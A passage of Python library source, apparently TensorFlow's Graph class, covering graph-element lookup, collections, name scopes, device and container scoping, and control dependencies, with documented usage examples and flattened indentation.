# pylint: disable=protected-access
op._set_attr("_class", attr_value_pb2.AttrValue(
list=attr_value_pb2.AttrValue.ListValue(s=all_colocation_groups)))
# pylint: enable=protected-access
# Sets "container" attribute if
# (1) self._container is not None
# (2) "is_stateful" is set in OpDef
# (3) "container" attribute is in OpDef
# (4) "container" attribute is None
if self._container and op.op_def.is_stateful:
try:
container_attr = op.get_attr("container")
except ValueError:
# "container" attribute is not in OpDef
pass
else:
if not container_attr:
op._set_attr("container", attr_value_pb2.AttrValue( # pylint: disable=protected-access
s=compat.as_bytes(self._container)))
def _add_new_tf_operations(self, compute_devices=True):
"""Creates `Operations` in this graph for any new TF_Operations.
This is useful for when TF_Operations are indirectly created by the C API
outside of the Operation constructor (e.g. by TF_ImportGraphDef,
TF_FinishWhile). This ensures there are corresponding Operations for all
TF_Operations in the underlying TF_Graph.
Args:
compute_devices: (Optional.) If True, device functions will be executed
to compute the device properties of each new Operation.
Returns:
A list of the new `Operation` objects.
"""
# Create all Operation objects before accessing their inputs since an op may
# be created before its inputs.
new_ops = [
self._create_op_from_tf_operation(c_op, compute_device=compute_devices)
for c_op in c_api_util.new_tf_operations(self)
]
# pylint: disable=protected-access
for op in new_ops:
# Operations created by the C API always retrieve shapes from the C API so
# we preserve the shapes of ops created in import_graph_def (from the
# "_output_shapes" attr of the imported NodeDef).
if not _USE_C_SHAPES:
_set_shape_and_handle_data_for_outputs_c_api(op)
new_control_inputs = self._control_dependencies_for_inputs(op.inputs)
op._add_control_inputs(new_control_inputs)
op._control_flow_post_processing()
# pylint: enable=protected-access
return new_ops
def as_graph_element(self, obj, allow_tensor=True, allow_operation=True):
"""Returns the object referred to by `obj`, as an `Operation` or `Tensor`.
This function validates that `obj` represents an element of this
graph, and gives an informative error message if it is not.
This function is the canonical way to get/validate an object of
one of the allowed types from an external argument reference in the
Session API.
This method may be called concurrently from multiple threads.
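For example (a minimal sketch):
```python
g = tf.Graph()
with g.as_default():
  c = tf.constant(1.0, name="c")
assert g.as_graph_element("c:0") is c    # Tensor lookup by name.
assert g.as_graph_element("c") is c.op   # Operation lookup by name.
assert g.as_graph_element(c) is c        # Pass-through for graph elements.
```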
Args:
obj: A `Tensor`, an `Operation`, or the name of a tensor or operation.
Can also be any object with an `_as_graph_element()` method that returns
a value of one of these types.
allow_tensor: If true, `obj` may refer to a `Tensor`.
allow_operation: If true, `obj` may refer to an `Operation`.
Returns:
The `Tensor` or `Operation` in the Graph corresponding to `obj`.
Raises:
TypeError: If `obj` is not a type that we support converting to one of
the allowed types.
ValueError: If `obj` is of an appropriate type but invalid. For
example, an invalid string.
KeyError: If `obj` is not an object in the graph.
"""
if self._finalized:
return self._as_graph_element_locked(obj, allow_tensor, allow_operation)
with self._lock:
return self._as_graph_element_locked(obj, allow_tensor, allow_operation)
def _as_graph_element_locked(self, obj, allow_tensor, allow_operation):
"""See `Graph.as_graph_element()` for details."""
# The vast majority of this function is figuring
# out what an API user might be doing wrong, so
# that we can give helpful error messages.
#
# Ideally, it would be nice to split it up, but we
# need context to generate nice error messages.
if allow_tensor and allow_operation:
types_str = "Tensor or Operation"
elif allow_tensor:
types_str = "Tensor"
elif allow_operation:
types_str = "Operation"
else:
raise ValueError("allow_tensor and allow_operation can't both be False.")
temp_obj = _as_graph_element(obj)
if temp_obj is not None:
obj = temp_obj
# If obj appears to be a name...
if isinstance(obj, compat.bytes_or_text_types):
name = compat.as_str(obj)
if ":" in name and allow_tensor:
# Looks like a Tensor name and can be a Tensor.
try:
op_name, out_n = name.split(":")
out_n = int(out_n)
except:
raise ValueError("The name %s looks a like a Tensor name, but is "
"not a valid one. Tensor names must be of the "
"form \"<op_name>:<output_index>\"." % repr(name))
if op_name in self._nodes_by_name:
op = self._nodes_by_name[op_name]
else:
raise KeyError("The name %s refers to a Tensor which does not "
"exist. The operation, %s, does not exist in the "
"graph." % (repr(name), repr(op_name)))
try:
return op.outputs[out_n]
except:
raise KeyError("The name %s refers to a Tensor which does not "
"exist. The operation, %s, exists but only has "
"%s outputs." % (repr(name), repr(op_name),
len(op.outputs)))
elif ":" in name and not allow_tensor:
# Looks like a Tensor name but can't be a Tensor.
raise ValueError("Name %s appears to refer to a Tensor, not a %s." %
(repr(name), types_str))
elif ":" not in name and allow_operation:
# Looks like an Operation name and can be an Operation.
if name not in self._nodes_by_name:
raise KeyError("The name %s refers to an Operation not in the "
"graph." % repr(name))
return self._nodes_by_name[name]
elif ":" not in name and not allow_operation:
# Looks like an Operation name but can't be an Operation.
if name in self._nodes_by_name:
# Yep, it's an Operation name
err_msg = ("The name %s refers to an Operation, not a %s." %
(repr(name), types_str))
else:
err_msg = ("The name %s looks like an (invalid) Operation name, "
"not a %s." % (repr(name), types_str))
err_msg += (" Tensor names must be of the form "
"\"<op_name>:<output_index>\".")
raise ValueError(err_msg)
elif isinstance(obj, Tensor) and allow_tensor:
# Actually obj is just the object it's referring to.
if obj.graph is not self:
raise ValueError("Tensor %s is not an element of this graph." % obj)
return obj
elif isinstance(obj, Operation) and allow_operation:
# Actually obj is just the object it's referring to.
if obj.graph is not self:
raise ValueError("Operation %s is not an element of this graph." % obj)
return obj
else:
# We give up!
raise TypeError("Can not convert a %s into a %s." % (type(obj).__name__,
types_str))
def get_operations(self):
"""Return the list of operations in the graph.
You can modify the operations in place, but modifications
to the returned list, such as inserts or deletes, have no effect on the
set of operations known to the graph.
This method may be called concurrently from multiple threads.
Returns:
A list of Operations.
"""
if self._finalized:
return list(self._nodes_by_id.values())
with self._lock:
return list(self._nodes_by_id.values())
def get_operation_by_name(self, name):
"""Returns the `Operation` with the given `name`.
This method may be called concurrently from multiple threads.
Args:
name: The name of the `Operation` to return.
Returns:
The `Operation` with the given `name`.
Raises:
TypeError: If `name` is not a string.
KeyError: If `name` does not correspond to an operation in this graph.
"""
if not isinstance(name, six.string_types):
raise TypeError("Operation names are strings (or similar), not %s." %
type(name).__name__)
return self.as_graph_element(name, allow_tensor=False, allow_operation=True)
def _get_operation_by_name_unsafe(self, name):
"""Returns the `Operation` with the given `name`.
This is an internal, unsafe version of `get_operation_by_name`. It skips many
checks and does not have user-friendly error messages, but runs considerably
faster. This method may be called concurrently from multiple threads.
Args:
name: The name of the `Operation` to return.
Returns:
The `Operation` with the given `name`.
Raises:
KeyError: If `name` does not correspond to an operation in this graph.
"""
if self._finalized:
return self._nodes_by_name[name]
with self._lock:
return self._nodes_by_name[name]
def _get_operation_by_tf_operation(self, tf_oper):
op_name = c_api.TF_OperationName(tf_oper)
return self._get_operation_by_name_unsafe(op_name)
def get_tensor_by_name(self, name):
"""Returns the `Tensor` with the given `name`.
This method may be called concurrently from multiple threads.
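For example (a minimal sketch; note the ":0" output-index suffix in the
tensor name):
```python
g = tf.Graph()
with g.as_default():
  c = tf.constant(1.0, name="c")
assert g.get_tensor_by_name("c:0") is c
```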
Args:
name: The name of the `Tensor` to return.
Returns:
The `Tensor` with the given `name`.
Raises:
TypeError: If `name` is not a string.
KeyError: If `name` does not correspond to a tensor in this graph.
"""
# Names should be strings.
if not isinstance(name, six.string_types):
raise TypeError("Tensor names are strings (or similar), not %s." %
type(name).__name__)
return self.as_graph_element(name, allow_tensor=True, allow_operation=False)
def _get_tensor_by_tf_output(self, tf_output):
"""Returns the `Tensor` representing `tf_output`.
Note that there is only one such `Tensor`, i.e. multiple calls to this
function with the same TF_Output value will always return the same `Tensor`
object.
Args:
tf_output: A wrapped `TF_Output` (the C API equivalent of `Tensor`).
Returns:
The `Tensor` that represents `tf_output`.
"""
op = self._get_operation_by_tf_operation(tf_output.oper)
return op.outputs[tf_output.index]
def _next_id(self):
"""Id for next Operation instance. Also increments the internal id."""
self._check_not_finalized()
with self._lock:
self._next_id_counter += 1
return self._next_id_counter
@property
def _last_id(self):
return self._next_id_counter
def _get_op_def(self, type): # pylint: disable=redefined-builtin
"""Returns the `OpDef` proto for `type`. `type` is a string."""
with c_api_util.tf_buffer() as buf:
# pylint: disable=protected-access
c_api.TF_GraphGetOpDef(self._c_graph, compat.as_bytes(type), buf)
# pylint: enable=protected-access
data = c_api.TF_GetBuffer(buf)
op_def = op_def_pb2.OpDef()
op_def.ParseFromString(compat.as_bytes(data))
return op_def
def as_default(self):
"""Returns a context manager that makes this `Graph` the default graph.
This method should be used if you want to create multiple graphs
in the same process. For convenience, a global default graph is
provided, and all ops will be added to this graph if you do not
create a new graph explicitly. Use this method with the `with` keyword
to specify that ops created within the scope of a block should be
added to this graph.
The default graph is a property of the current thread. If you
create a new thread, and wish to use the default graph in that
thread, you must explicitly add a `with g.as_default():` in that
thread's function.
The following code examples are equivalent:
```python
# 1. Using Graph.as_default():
g = tf.Graph()
with g.as_default():
c = tf.constant(5.0)
assert c.graph is g
# 2. Constructing and making default:
with tf.Graph().as_default() as g:
c = tf.constant(5.0)
assert c.graph is g
```
If eager execution is enabled, ops created under this context manager will be
added to the graph instead of executed eagerly.
Returns:
A context manager for using this graph as the default graph.
"""
return _default_graph_stack.get_controller(self)
@property
def collections(self):
"""Returns the names of the collections known to this graph."""
return list(self._collections)
def add_to_collection(self, name, value):
"""Stores `value` in the collection with the given `name`.
Note that collections are not sets, so it is possible to add a value to
a collection several times.
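For example (a minimal sketch; "my_collection" is an arbitrary illustrative
key):
```python
g = tf.Graph()
g.add_to_collection("my_collection", 42)
g.add_to_collection("my_collection", 42)  # Collections are lists, not sets.
assert g.get_collection("my_collection") == [42, 42]
```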
Args:
name: The key for the collection. The `GraphKeys` class
contains many standard names for collections.
value: The value to add to the collection.
""" # pylint: disable=g-doc-exception
self._check_not_finalized()
with self._lock:
if name not in self._collections:
self._collections[name] = [value]
else:
self._collections[name].append(value)
def add_to_collections(self, names, value):
"""Stores `value` in the collections given by `names`.
Note that collections are not sets, so it is possible to add a value to
a collection several times. This function makes sure that duplicates in
`names` are ignored, but it will not check for pre-existing membership of
`value` in any of the collections in `names`.
`names` can be any iterable, but if `names` is a string, it is treated as a
single collection name.
Args:
names: The keys for the collections to add to. The `GraphKeys` class
contains many standard names for collections.
value: The value to add to the collections.
"""
# Make sure names are unique, but treat strings as a single collection name
names = (names,) if isinstance(names, six.string_types) else set(names)
for name in names:
self.add_to_collection(name, value)
def get_collection_ref(self, name):
"""Returns a list of values in the collection with the given `name`.
If the collection exists, this returns the list itself, which can
be modified in place to change the collection. If the collection does
not exist, it is created as an empty list and the list is returned.
This is different from `get_collection()` which always returns a copy of
the collection list if it exists and never creates an empty collection.
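For example (a minimal sketch; "losses" is used only as an illustrative key):
```python
g = tf.Graph()
ref = g.get_collection_ref("losses")  # Created as an empty list on first use.
ref.append("dummy_loss")
assert g.get_collection("losses") == ["dummy_loss"]
assert g.get_collection_ref("losses") is ref  # Same underlying list.
```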
Args:
name: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
Returns:
The list of values in the collection with the given `name`, or an empty
list if no value has been added to that collection.
""" # pylint: disable=g-doc-exception
with self._lock:
coll_list = self._collections.get(name, None)
if coll_list is None:
coll_list = []
self._collections[name] = coll_list
return coll_list
def get_collection(self, name, scope=None):
"""Returns a list of values in the collection with the given `name`.
Unlike `get_collection_ref()`, which returns the actual collection list if it
exists, this method always returns a new copy of the list each time it is
called.
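For example (a minimal sketch; it assumes the standard global-variables
collection and uses `tf.name_scope` only to give the variables a filterable
name prefix):
```python
g = tf.Graph()
with g.as_default():
  with tf.name_scope("layer1"):
    v1 = tf.Variable(1.0, name="w")
  with tf.name_scope("layer2"):
    v2 = tf.Variable(2.0, name="w")
assert g.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope="layer1") == [v1]
```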
Args:
name: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
scope: (Optional.) A string. If supplied, the resulting list is filtered
to include only items whose `name` attribute matches `scope` using
`re.match`. Items without a `name` attribute are never returned if a
scope is supplied. The choice of `re.match` means that a `scope` without
special tokens filters by prefix.
Returns:
The list of values in the collection with the given `name`, or
an empty list if no value has been added to that collection. The
list contains the values in the order under which they were
collected.
""" # pylint: disable=g-doc-exception
with self._lock:
collection = self._collections.get(name, None)
if collection is None:
return []
if scope is None:
return list(collection)
else:
c = []
regex = re.compile(scope)
for item in collection:
if hasattr(item, "name") and regex.match(item.name):
c.append(item)
return c
def get_all_collection_keys(self):
"""Returns a list of collections used in this graph."""
with self._lock:
return [x for x in self._collections if isinstance(x, six.string_types)]
def clear_collection(self, name):
"""Clears all values in a collection.
Args:
name: The key for the collection. The `GraphKeys` class contains many
standard names for collections.
"""
self._check_not_finalized()
with self._lock:
if name in self._collections:
del self._collections[name]
@tf_contextlib.contextmanager
def _original_op(self, op):
"""Python 'with' handler to help annotate ops with their originator.
An op may have an 'original_op' property that indicates the op on which
it was based. For example a replica op is based on the op that was
replicated and a gradient op is based on the op that was differentiated.
All ops created in the scope of this 'with' handler will have
the given 'op' as their original op.
Args:
op: The Operation that all ops created in this scope will have as their
original op.
Yields:
Nothing.
"""
old_original_op = self._default_original_op
try:
self._default_original_op = op
yield
finally:
self._default_original_op = old_original_op
@property
def _name_stack(self):
# This may be called from a thread where name_stack doesn't yet exist.
if not hasattr(self._thread_local, "_name_stack"):
self._thread_local._name_stack = ""
return self._thread_local._name_stack
@_name_stack.setter
def _name_stack(self, name_stack):
self._thread_local._name_stack = name_stack
# pylint: disable=g-doc-return-or-yield,line-too-long
@tf_contextlib.contextmanager
def name_scope(self, name):
r"""Returns a context manager that creates hierarchical names for operations.
A graph maintains a stack of name scopes. A `with name_scope(...):`
statement pushes a new name onto the stack for the lifetime of the context.
The `name` argument will be interpreted as follows:
* A string (not ending with '/') will create a new name scope, in which
`name` is appended to the prefix of all operations created in the
context. If `name` has been used before, it will be made unique by
calling `self.unique_name(name)`.
* A scope previously captured from a `with g.name_scope(...) as
scope:` statement will be treated as an "absolute" name scope, which
makes it possible to re-enter existing scopes.
* A value of `None` or the empty string will reset the current name scope
to the top-level (empty) name scope.
For example:
```python
with tf.Graph().as_default() as g:
c = tf.constant(5.0, name="c")
assert c.op.name == "c"
c_1 = tf.constant(6.0, name="c")
assert c_1.op.name == "c_1"
# Creates a scope called "nested"
with g.name_scope("nested") as scope:
nested_c = tf.constant(10.0, name="c")
assert nested_c.op.name == "nested/c"
# Creates a nested scope called "inner".
with g.name_scope("inner"):
nested_inner_c = tf.constant(20.0, name="c")
assert nested_inner_c.op.name == "nested/inner/c"
# Create a nested scope called "inner_1".
with g.name_scope("inner"):
nested_inner_1_c = tf.constant(30.0, name="c")
assert nested_inner_1_c.op.name == "nested/inner_1/c"
# Treats `scope` as an absolute name scope, and
# switches to the "nested/" scope.
with g.name_scope(scope):
nested_d = tf.constant(40.0, name="d")
assert nested_d.op.name == "nested/d"
with g.name_scope(""):
e = tf.constant(50.0, name="e")
assert e.op.name == "e"
```
The name of the scope itself can be captured by `with
g.name_scope(...) as scope:`, which stores the name of the scope
in the variable `scope`. This value can be used to name an
operation that represents the overall result of executing the ops
in a scope. For example:
```python
inputs = tf.constant(...)
with g.name_scope('my_layer') as scope:
weights = tf.Variable(..., name="weights")
biases = tf.Variable(..., name="biases")
affine = tf.matmul(inputs, weights) + biases
output = tf.nn.relu(affine, name=scope)
```
NOTE: This constructor validates the given `name`. Valid scope
names match one of the following regular expressions:
[A-Za-z0-9.][A-Za-z0-9_.\\-/]* (for scopes at the root)
[A-Za-z0-9_.\\-/]* (for other scopes)
Args:
name: A name for the scope.
Returns:
A context manager that installs `name` as a new name scope.
Raises:
ValueError: If `name` is not a valid scope name, according to the rules
above.
"""
if name:
if isinstance(name, compat.bytes_or_text_types):
name = compat.as_str(name)
if self._name_stack:
# Scopes created in a nested scope may have initial characters
# that are illegal as the initial character of an op name
# (viz. '-', '\', '/', and '_').
if not _VALID_SCOPE_NAME_REGEX.match(name):
raise ValueError("'%s' is not a valid scope name" % name)
else:
# Scopes created in the root must match the more restrictive
# op name regex, which constrains the initial character.
if not _VALID_OP_NAME_REGEX.match(name):
raise ValueError("'%s' is not a valid scope name" % name)
try:
old_stack = self._name_stack
if not name: # Both for name=None and name="" we re-set to empty scope.
new_stack = None
elif name[-1] == "/":
new_stack = _name_from_scope_name(name)
else:
new_stack = self.unique_name(name)
self._name_stack = new_stack
yield "" if new_stack is None else new_stack + "/"
finally:
self._name_stack = old_stack
# pylint: enable=g-doc-return-or-yield,line-too-long
def unique_name(self, name, mark_as_used=True):
"""Return a unique operation name for `name`.
Note: You rarely need to call `unique_name()` directly. Most of
the time you just need to create `with g.name_scope()` blocks to
generate structured names.
`unique_name` is used to generate structured names, separated by
`"/"`, to help identify operations when debugging a graph.
Operation names are displayed in error messages reported by the
TensorFlow runtime, and in various visualization tools such as
TensorBoard.
If `mark_as_used` is set to `True`, which is the default, a new
unique name is created and marked as in use. If it's set to `False`,
the unique name is returned without actually being marked as used.
This is useful when the caller simply wants to know what the name
to be created will be.
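For example (a minimal sketch):
```python
g = tf.Graph()
assert g.unique_name("foo") == "foo"
assert g.unique_name("foo") == "foo_1"
# With mark_as_used=False the candidate name is not reserved:
assert g.unique_name("foo", mark_as_used=False) == "foo_2"
assert g.unique_name("foo", mark_as_used=False) == "foo_2"
```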
Args:
name: The name for an operation.
mark_as_used: Whether to mark this name as being used.
Returns:
A string to be passed to `create_op()` that will be used
to name the operation being created.
"""
if self._name_stack:
name = self._name_stack + "/" + name
# For the sake of checking for names in use, we treat names as case
# insensitive (e.g. foo = Foo).
name_key = name.lower()
i = self._names_in_use.get(name_key, 0)
# Increment the number for "name_key".
if mark_as_used:
self._names_in_use[name_key] = i + 1
if i > 0:
base_name_key = name_key
# Make sure the composed name key is not already used.
while name_key in self._names_in_use:
name_key = "%s_%d" % (base_name_key, i)
i += 1
# Mark the composed name_key as used in case someone wants
# to call unique_name("name_1").
if mark_as_used:
self._names_in_use[name_key] = 1
# Return the new name with the original capitalization of the given name.
name = "%s_%d" % (name, i-1)
return name
def get_name_scope(self):
"""Returns the current name scope.
For example:
```python
with tf.name_scope('scope1'):
with tf.name_scope('scope2'):
print(tf.get_default_graph().get_name_scope())
```
would print the string `scope1/scope2`.
Returns:
A string representing the current name scope.
"""
return self._name_stack
@tf_contextlib.contextmanager
def _colocate_with_for_gradient(self, op, gradient_uid,
ignore_existing=False):
with self.colocate_with(op, ignore_existing):
if gradient_uid is not None and self._control_flow_context is not None:
try:
self._control_flow_context.EnterGradientColocation(op, gradient_uid)
yield
finally:
self._control_flow_context.ExitGradientColocation(op, gradient_uid)
else:
yield
@tf_contextlib.contextmanager
def colocate_with(self, op, ignore_existing=False):
"""Returns a context manager that specifies an op to colocate with.
Note: this function is not for public use, only for internal libraries.
For example:
```python
a = tf.Variable([1.0])
with g.colocate_with(a):
b = tf.constant(1.0)
c = tf.add(a, b)
```
`b` and `c` will always be colocated with `a`, no matter where `a`
is eventually placed.
**NOTE** Using a colocation scope resets any existing device constraints.
If `op` is `None` then `ignore_existing` must be `True` and the new
scope resets all colocation and device constraints.
Args:
op: The op to colocate all created ops with, or `None`.
ignore_existing: If true, only applies colocation of this op within
the context, rather than applying all colocation properties
on the stack. If `op` is `None`, this value must be `True`.
Raises:
ValueError: if op is None but ignore_existing is False.
Yields:
A context manager that specifies the op with which to colocate
newly created ops.
"""
if op is None and not ignore_existing:
raise ValueError("Trying to reset colocation (op is None) but "
"ignore_existing is not True")
if op is not None and not isinstance(op, Operation):
# We always want to colocate with the reference op.
op = internal_convert_to_tensor_or_indexed_slices(op, as_ref=True).op
# By default, colocate_with resets the device function stack,
# since colocate_with is typically used in specific internal
# library functions where colocation is intended to be "stronger"
# than device functions.
#
# In the future, a caller may specify that device_functions win
# over colocation, in which case we can add support.
device_fn_tmp = self._device_function_stack
self._device_function_stack = []
if ignore_existing:
current_stack = self._colocation_stack
self._colocation_stack = []
if op is not None:
self._colocation_stack.append(op)
try:
yield
finally:
# Restore device function stack
self._device_function_stack = device_fn_tmp
if op is not None:
self._colocation_stack.pop()
# Reset the colocation stack if requested.
if ignore_existing:
self._colocation_stack = current_stack
@tf_contextlib.contextmanager
def device(self, device_name_or_function):
# pylint: disable=line-too-long
"""Returns a context manager that specifies the default device to use.
The `device_name_or_function` argument may either be a device name
string, a device function, or None:
* If it is a device name string, all operations constructed in
this context will be assigned to the device with that name, unless
overridden by a nested `device()` context.
* If it is a function, it will be treated as a function from
Operation objects to device name strings, and invoked each time
a new Operation is created. The Operation will be assigned to
the device with the returned name.
* If it is None, all `device()` invocations from the enclosing context
will be ignored.
For information about the valid syntax of device name strings, see
the documentation in
[`DeviceNameUtils`](https://www.tensorflow.org/code/tensorflow/core/util/device_name_utils.h).
For example:
```python
with g.device('/device:GPU:0'):
# All operations constructed in this context will be placed
# on GPU 0.
with g.device(None):
# All operations constructed in this context will have no
# assigned device.
# Defines a function from `Operation` to device string.
def matmul_on_gpu(n):
if n.type == "MatMul":
return "/device:GPU:0"
else:
return "/cpu:0"
with g.device(matmul_on_gpu):
# All operations of type "MatMul" constructed in this context
# will be placed on GPU 0; all other operations will be placed
# on CPU 0.
```
**N.B.** The device scope may be overridden by op wrappers or
other library code. For example, a variable assignment op
`v.assign()` must be colocated with the `tf.Variable` `v`, and
incompatible device scopes will be ignored.
Args:
device_name_or_function: The device name or function to use in
the context.
Yields:
A context manager that specifies the default device to use for newly
created ops.
"""
# pylint: enable=line-too-long
if (device_name_or_function is not None and
not callable(device_name_or_function)):
device_function = pydev.merge_device(device_name_or_function)
else:
device_function = device_name_or_function
try:
self._device_function_stack.append(device_function)
yield
finally:
self._device_function_stack.pop()
def _apply_device_functions(self, op):
"""Applies the current device function stack to the given operation."""
# Apply any device functions in reverse order, so that the most recently
# pushed function has the first chance to apply a device to the op.
# We apply here because the result can depend on the Operation's
# signature, which is computed in the Operation constructor.
for device_function in reversed(self._device_function_stack):
if device_function is None:
break
op._set_device(device_function(op)) # pylint: disable=protected-access
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def container(self, container_name):
"""Returns a context manager that specifies the resource container to use.
Stateful operations, such as variables and queues, can maintain their
states on devices so that they can be shared by multiple processes.
A resource container is a string name under which these stateful
operations are tracked. These resources can be released or cleared
with `tf.Session.reset()`.
For example:
```python
with g.container('experiment0'):
# All stateful Operations constructed in this context will be placed
# in resource container "experiment0".
v1 = tf.Variable([1.0])
v2 = tf.Variable([2.0])
with g.container("experiment1"):
# All stateful Operations constructed in this context will be
# placed in resource container "experiment1".
v3 = tf.Variable([3.0])
q1 = tf.FIFOQueue(10, tf.float32)
# All stateful Operations constructed in this context will be
# placed in resource container "experiment0".
v4 = tf.Variable([4.0])
q1 = tf.FIFOQueue(20, tf.float32)
with g.container(""):
# All stateful Operations constructed in this context will be
# placed in the default resource container.
v5 = tf.Variable([5.0])
q3 = tf.FIFOQueue(30, tf.float32)
# Resets container "experiment0", after which the state of v1, v2, v4, q1
# will become undefined (such as uninitialized).
tf.Session.reset(target, ["experiment0"])
```
Args:
container_name: container name string.
Returns:
A context manager for defining resource containers for stateful ops,
yields the container name.
"""
original_container = self._container
try:
self._container = container_name
yield self._container
finally:
self._container = original_container
# pylint: enable=g-doc-return-or-yield
class _ControlDependenciesController(object):
"""Context manager for `control_dependencies()`."""
def __init__(self, graph, control_inputs):
"""Create a new `_ControlDependenciesController`.
A `_ControlDependenciesController` is the context manager for
`with tf.control_dependencies()` blocks. These normally nest,
as described in the documentation for `control_dependencies()`.
The `control_inputs` argument lists control dependencies that must be
added to the current set of control dependencies. Because of
uniquification the set can be empty even if the caller passed a list of
ops. The special value `None` indicates that we want to start a new
empty set of control dependencies instead of extending the current set.
In that case we also clear the current control flow context, which is an
additional mechanism to add control dependencies.
Args:
graph: The graph that this controller is managing.
control_inputs: List of ops to use as control inputs in addition
to the current control dependencies. None to indicate that
the dependencies should be cleared.
"""
self._graph = graph
if control_inputs is None:
self._control_inputs_val = []
self._new_stack = True
else:
self._control_inputs_val = control_inputs
self._new_stack = False
self._seen_nodes = set()
self._old_stack = None
self._old_control_flow_context = None
# pylint: disable=protected-access
def __enter__(self):
if self._new_stack:
# Clear the control_dependencies graph.
self._old_stack = self._graph._control_dependencies_stack
self._graph._control_dependencies_stack = []
# Clear the control_flow_context too.
self._old_control_flow_context = self._graph._get_control_flow_context()
self._graph._set_control_flow_context(None)
self._graph._push_control_dependencies_controller(self)
def __exit__(self, unused_type, unused_value, unused_traceback):
self._graph._pop_control_dependencies_controller(self)
if self._new_stack:
self._graph._control_dependencies_stack = self._old_stack
self._graph._set_control_flow_context(self._old_control_flow_context)
# pylint: enable=protected-access
@property
def control_inputs(self):
return self._control_inputs_val
def add_op(self, op):
self._seen_nodes.add(op)
def op_in_group(self, op):
return op in self._seen_nodes
def _push_control_dependencies_controller(self, controller):
self._control_dependencies_stack.append(controller)
def _pop_control_dependencies_controller(self, controller):
assert self._control_dependencies_stack[-1] is controller
self._control_dependencies_stack.pop()
def _current_control_dependencies(self):
ret = set()
for controller in self._control_dependencies_stack:
for op in controller.control_inputs:
ret.add(op)
return ret
def _control_dependencies_for_inputs(self, input_ops):
"""For an op that takes `input_ops` as inputs, compute control inputs.
The returned control dependencies should yield an execution that
is equivalent to adding all control inputs in
self._control_dependencies_stack to a newly created op. However,
this function attempts to prune the returned control dependencies
by observing that nodes created within the same `with
control_dependencies(...):` block may have data dependencies that make
the explicit approach redundant.
Args:
input_ops: The data input ops for an op to be created.
Returns:
A list of control inputs for the op to be created.
"""
ret = []
for controller in self._control_dependencies_stack:
# If any of the input_ops already depends on the inputs from controller,
# we say that the new op is dominated (by that input), and we therefore
# do not need to add control dependencies for this controller's inputs.
dominated = False
for op in input_ops:
if controller.op_in_group(op):
dominated = True
break
if not dominated:
# Don't add a control input if we already have a data dependency on it.
# NOTE(mrry): We do not currently track transitive data dependencies,
# so we may add redundant control inputs.
ret.extend([c for c in controller.control_inputs if c not in input_ops])
return ret
def _record_op_seen_by_control_dependencies(self, op):
"""Record that the given op depends on all registered control dependencies.
Args:
op: An Operation.
"""
for controller in self._control_dependencies_stack:
controller.add_op(op)
def control_dependencies(self, control_inputs):
"""Returns a context manager that specifies control dependencies.
Use with the `with` keyword to specify that all operations constructed
within the context should have control dependencies on
`control_inputs`. For example:
```python
with g.control_dependencies([a, b, c]):
# `d` and `e` will only run after `a`, `b`, and `c` have executed.
d = ...
e = ...
```
Multiple calls to `control_dependencies()` can be nested, and in
that case a new `Operation` will have control dependencies on the union
of `control_inputs` from all active contexts.
```python
with g.control_dependencies([a, b]):
# Ops constructed here run after `a` and `b`.
with g.control_dependencies([c, d]):
# Ops constructed here run after `a`, `b`, `c`, and `d`.
```
You can pass None to clear the control dependencies:
```python
with g.control_dependencies([a, b]):
# Ops constructed here run after `a` and `b`.
with g.control_dependencies(None):
# Ops constructed here run normally, not waiting for either `a` or `b`.
with g.control_dependencies([c, d]):
# Ops constructed here run after `c` and `d`, also not waiting
# for either `a` or `b`.
```
*N.B.* The control dependencies context applies *only* to ops that
are constructed within the context. Merely using an op or tensor
in the context does not add a control dependency. The following
example illustrates this point:
```python
# WRONG
def my_func(pred, tensor):
t = tf.matmul(tensor, tensor)
with tf.control_dependencies([pred]):
# The matmul op is created outside the context, so no control
# dependency will be added.
return t
# RIGHT
def my_func(pred, tensor):
with tf.control_dependencies([pred]):
# The matmul op is created in the context, so a control dependency
# will be added.
return tf.matmul(tensor, tensor)
```
Also note that though execution of ops created under this scope will trigger
execution of the dependencies, the ops created under this scope might still
be pruned from a normal TensorFlow graph. For example, in the following
snippet of code the dependencies are never executed:
```python
loss = model.loss()
with tf.control_dependencies(dependencies):
loss = loss + tf.constant(1) # note: dependencies ignored in the
# backward pass
return tf.gradients(loss, model.variables)
```
This is because evaluating the gradient graph does not require evaluating
the constant(1) op created in the forward pass.
Args:
control_inputs: A list of `Operation` or `Tensor` objects which
must be executed or computed before running the operations
defined in the context. Can also be `None` to clear the control
dependencies.
Returns:
A context manager that specifies control dependencies for all
operations constructed within the context.
Raises:
TypeError: If `control_inputs` is not a list of `Operation` or
`Tensor` objects.
"""
if control_inputs is None:
return self._ControlDependenciesController(self, None)
# First convert the inputs to ops, and deduplicate them.
# NOTE(mrry): Other than deduplication, we do not currently track direct
# or indirect dependencies between control_inputs, which may result in
# redundant control inputs.
control_ops = []
current = self._current_control_dependencies()
for c in control_inputs:
if isinstance(c, IndexedSlices):
c = c.op
c = self.as_graph_element(c)
if isinstance(c, Tensor):
c = c.op
elif not isinstance(c, Operation):
raise TypeError("Control input must be Operation or Tensor: %s" % c)
if c not in current:
control_ops.append(c)
current.add(c)
return self._ControlDependenciesController(self, control_ops)
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def _attr_scope(self, attr_map):
"""EXPERIMENTAL: A context manager for setting attributes on operators.
This context manager can be used to add additional
attributes to operators within the scope of the context.
For example:
with ops.Graph().as_default() as g:
f_1 = Foo() # No extra attributes
with g._attr_scope({"_a": tf.attr_value_pb2.AttrValue(b=False)}):
f_2 = Foo() # Additional attribute _a=False
with g._attr_scope({"_a": tf.attr_value_pb2.AttrValue(b=True)}):
             f_3 = Foo() # Additional attribute _a=True
with g._attr_scope({"_a": None}):
f_4 = Foo() # No additional attributes.
Args:
attr_map: A dictionary mapping attr name strings to
AttrValue protocol buffers or None.
Returns:
      A context manager that sets the additional attributes for one or more
      ops created in that context.
Raises:
TypeError: If attr_map is not a dictionary mapping
strings to AttrValue protobufs.
"""
if not isinstance(attr_map, dict):
raise TypeError("attr_map must be a dictionary mapping "
"strings to AttrValue protocol buffers")
# The saved_attrs dictionary stores any currently-set labels that
# will be overridden by this context manager.
saved_attrs = {}
# Install the given attribute
for name, attr in attr_map.items():
if not (isinstance(name, six.string_types) and
(isinstance(attr, (type(None), attr_value_pb2.AttrValue)) or
callable(attr))):
raise TypeError("attr_map must be a dictionary mapping "
